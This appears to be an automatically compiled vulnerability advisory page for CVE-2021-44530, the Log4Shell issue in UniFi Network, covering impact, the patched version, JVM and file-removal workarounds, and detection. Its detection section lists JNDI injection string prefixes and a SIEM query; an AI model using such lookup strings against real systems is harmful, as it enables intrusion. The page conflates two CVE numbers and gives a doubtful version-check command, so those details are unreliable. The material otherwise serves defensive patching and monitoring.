Login Sign Up

CVE-2021-44530

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

This is the Log4Shell vulnerability (CVE-2021-44228) affecting UniFi Network software. It allows remote code execution via JNDI injection in Log4j, enabling attackers to take full control of affected systems. Organizations running UniFi Network Version 6.5.53 or earlier are vulnerable.

💻 Affected Systems

Products:
  • UniFi Network Application
Versions: Version 6.5.53 and earlier
Operating Systems: All platforms running UniFi Network
Default Config Vulnerable: ⚠️ Yes
Notes: Affects all default installations using vulnerable Log4j versions. UniFi Network runs on various platforms including Windows, Linux, and macOS.

📦 What is this software?

Unifi Network Controller by Ui

View all CVEs affecting Unifi Network Controller →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise allowing attackers to install malware, steal data, pivot to other systems, and maintain persistent access.

🟠

Likely Case

Remote code execution leading to cryptocurrency mining, ransomware deployment, or data exfiltration.

🟢

If Mitigated

Limited impact with proper network segmentation, egress filtering, and security controls preventing successful exploitation.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Widely exploited in the wild with numerous public proof-of-concept exploits available. Attack requires no authentication.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Version 6.5.54 and later

Vendor Advisory: https://community.ui.com/releases/Security-Advisory-Bulletin-023-023/808a1db0-5f8e-4b91-9097-9822f3f90207

Restart Required: Yes

Instructions:

1. Download UniFi Network Version 6.5.54 or later from UI.com. 2. Stop the UniFi Network service. 3. Install the updated version. 4. Restart the service.

🔧 Temporary Workarounds

Log4j JVM Parameter Mitigation

all

Set Log4j system property to disable JNDI lookups

Add '-Dlog4j2.formatMsgNoLookups=true' to JVM startup parameters

Remove JndiLookup Class

linux

Remove vulnerable Log4j class file from installation

find /usr/lib/unifi -name "*log4j*.jar" -exec zip -q -d {} org/apache/logging/log4j/core/lookup/JndiLookup.class \;

🧯 If You Can't Patch

  • Block outbound LDAP and RMI traffic from UniFi systems at network perimeter
  • Implement strict network segmentation to isolate UniFi systems from critical assets

🔍 How to Verify

Check if Vulnerable:

Check UniFi Network version via web interface or command: 'java -jar /usr/lib/unifi/lib/log4j-core-*.jar' to check Log4j version

Check Version:

grep -i version /usr/lib/unifi/system.properties 2>/dev/null || check web interface

Verify Fix Applied:

Verify version is 6.5.54 or later in UniFi web interface under Settings > System

📡 Detection & Monitoring

Log Indicators:

  • ${jndi:ldap://
  • ${jndi:rmi://
  • ${jndi:dns:// in application logs

Network Indicators:

  • Outbound LDAP/RMI connections from UniFi systems to unknown external IPs

SIEM Query:

source="unifi" AND "${jndi:"

📊 Metadata

CVE ID: CVE-2021-44530
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-20
Published: January 14, 2022
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-44530, you might also want to check these:

CVE-2022-47190 10.0

CVE-2022-47190 allows remote attackers to upload malicious firmware containing a webshell to Generex...

Same vulnerability type (CWE-20)
CVE-2024-3400 10.0

CVE-2024-3400 is a critical command injection vulnerability in Palo Alto Networks PAN-OS GlobalProte...

Same vulnerability type (CWE-20)
CVE-2023-42802 10.0

This critical vulnerability in GLPI allows attackers to upload malicious PHP files to unauthorized d...

Same vulnerability type (CWE-20)